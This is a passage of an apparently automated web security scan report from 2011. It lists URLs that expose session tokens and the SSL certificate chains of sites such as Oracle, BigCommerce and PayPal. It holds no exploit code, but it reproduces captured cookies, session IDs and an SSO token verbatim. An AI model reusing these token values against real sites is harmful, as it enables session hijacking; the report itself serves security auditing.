X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Location: http://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:53:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:05 GMT
Connection: keep-alive

8.37. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=57345927025&app_id=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc60f4ba8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cb50af8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31d2c4284%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd66cbd98%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273fd1124%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=57345927025&app_id=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc60f4ba8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cb50af8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31d2c4284%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd66cbd98%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273fd1124%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.53
X-Cnection: close
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=fd66cbd98&origin=http\u00253A\u00252F\u00252Fwww.readwriteweb.com\u00252Ff27c152a9&relation=parent&transport=postmessage&frame=f1fd77541", "http:
...[SNIP]...

8.38. http://www.google.com/search previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following links that appear to contain session tokens:

http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0
http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe's+Economy&page=1
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst
http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Acnbc.com+JSESSIONID HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

8.39. http://www.oracle.com/us/technologies/virtualization/index.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/us/technologies/virtualization/index.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://event.on24.com/view/presentation/flash/EventConsoleMVC.html?titlecolor=000000&simulive=y&eventid=230989&sessionid=1&username=&partnerref=ocomvirtbanner&format=fhaudio&key=A6199BFA52B30C22E040FB8EC497CF7A&text_language_id=en&playerwidth=793&playerheight=597&overwritelobby=y&eventuserid=39776441&contenttype=A&mediametricsessionid=39052776&mediametricid=597453&usercd=39776441&mode=launch

Request

GET /us/technologies/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35997532225678913,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<li>Video: <a href="http://event.on24.com/view/presentation/flash/EventConsoleMVC.html?titlecolor=000000&simulive=y&eventid=230989&sessionid=1&username=&partnerref=ocomvirtbanner&format=fhaudio&key=A6199BFA52B30C22E040FB8EC497CF7A&text_language_id=en&playerwidth=793&playerheight=597&overwritelobby=y&eventuserid=39776441&contenttype=A&mediametricsessionid=39052776&mediametricid=597453&usercd=39776441&mode=launch#">Virtualization Trends: What You Need to Know Now</a>
...[SNIP]...

8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/webapps/dialogue/dlgpage.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF

Request

GET /webapps/dialogue/dlgpage.jsp HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 971

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Redirect to Oracle SSO Server</TITLE>
</HEAD><BODY>
<H1>Redirect to Oracle SSO Server</H1>
The document has moved <A HREF="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF">here</A>
...[SNIP]...

8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.readwriteweb.com
Path:	/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.apture.com/js/apture.js?siteToken=H0arRY0

Request

GET /%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22 HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

8.42. http://www.readwriteweb.com/404.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.readwriteweb.com
Path:	/404.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.apture.com/js/apture.js?siteToken=H0arRY0

Request

GET /404.html HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B; PHPSESSID=uu8u8il3haqs9qituee6bsgku7

Response

9. SSL certificate previous next
There are 22 instances of this issue:

https://account.bigcommerce.com/
https://myshopify.com/
https://support.bigcommerce.com/
https://www.bigcommerce.com/
https://bugzilla.mozilla.org/
https://cms.paypal.com/
https://deloitte.zettaneer.com/
https://dne.oracle.com/
https://docs.google.com/
https://education.oracle.com/
https://event.on24.com/
https://forms.netsuite.com/
https://forums.oracle.com/
https://login.cnbc.com/
https://login.oracle.com/
https://myprofile.oracle.com/
https://oracleus.wingateweb.com/
https://register.cnbc.com/
https://shop.oracle.com/
https://support.oracle.com/
https://www.atg.com/
https://www.cvs.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

9.1. https://account.bigcommerce.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://account.bigcommerce.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.bigcommerce.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Mon Dec 07 18:00:00 GMT-06:00 2009
Valid to:	Tue Dec 11 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:	Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:	Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

9.2. https://myshopify.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://myshopify.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	*.myshopify.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon May 10 16:23:08 GMT-06:00 2010
Valid to:	Wed Aug 12 13:17:14 GMT-06:00 2015

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

9.3. https://support.bigcommerce.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://support.bigcommerce.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.bigcommerce.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Mon Dec 07 18:00:00 GMT-06:00 2009
Valid to:	Tue Dec 11 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:	Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:	Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

9.4. https://www.bigcommerce.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.bigcommerce.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Mon Dec 07 18:00:00 GMT-06:00 2009
Valid to:	Tue Dec 11 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:	Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:	Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

9.5. https://bugzilla.mozilla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.mozilla.org
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Nov 30 21:42:54 GMT-06:00 2009
Valid to:	Fri Dec 02 04:55:27 GMT-06:00 2011

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

9.6. https://cms.paypal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cms.paypal.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.paypal.com,ST=California
Issued by:	Akamai Subordinate CA 3
Valid from:	Fri Apr 08 12:05:24 GMT-06:00 2011
Valid to:	Sun Apr 08 12:05:24 GMT-06:00 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

9.7. https://deloitte.zettaneer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://deloitte.zettaneer.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.zettaneer.com
Issued by:	Network Solutions Certificate Authority
Valid from:	Wed May 11 18:00:00 GMT-06:00 2011
Valid to:	Fri May 29 17:59:59 GMT-06:00 2015

Certificate chain #1

Issued to:	Network Solutions Certificate Authority
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Apr 09 18:00:00 GMT-06:00 2006
Valid to:	Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:	UTN-USERFirst-Hardware
Issued by:	AddTrust External CA Root
Valid from:	Tue Jun 07 02:09:10 GMT-06:00 2005
Valid to:	Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 04:48:38 GMT-06:00 2000
Valid to:	Sat May 30 04:48:38 GMT-06:00 2020

9.8. https://dne.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://dne.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.oracle.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:	Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9.9. https://docs.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:	Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:	Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

9.10. https://education.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.oracle.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:	Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9.11. https://event.on24.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://event.on24.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.on24.com
Issued by:	Network Solutions Certificate Authority
Valid from:	Tue Oct 07 18:00:00 GMT-06:00 2008
Valid to:	Thu Oct 18 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	Network Solutions Certificate Authority
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Apr 09 18:00:00 GMT-06:00 2006
Valid to:	Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:	Tue Jul 09 12:19:22 GMT-06:00 2019

9.12. https://forms.netsuite.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.netsuite.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.netsuite.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Jan 07 17:22:23 GMT-06:00 2010
Valid to:	Mon Jan 07 17:22:23 GMT-06:00 2013

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Thu Jun 29 11:06:20 GMT-06:00 2034

9.13. https://forums.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

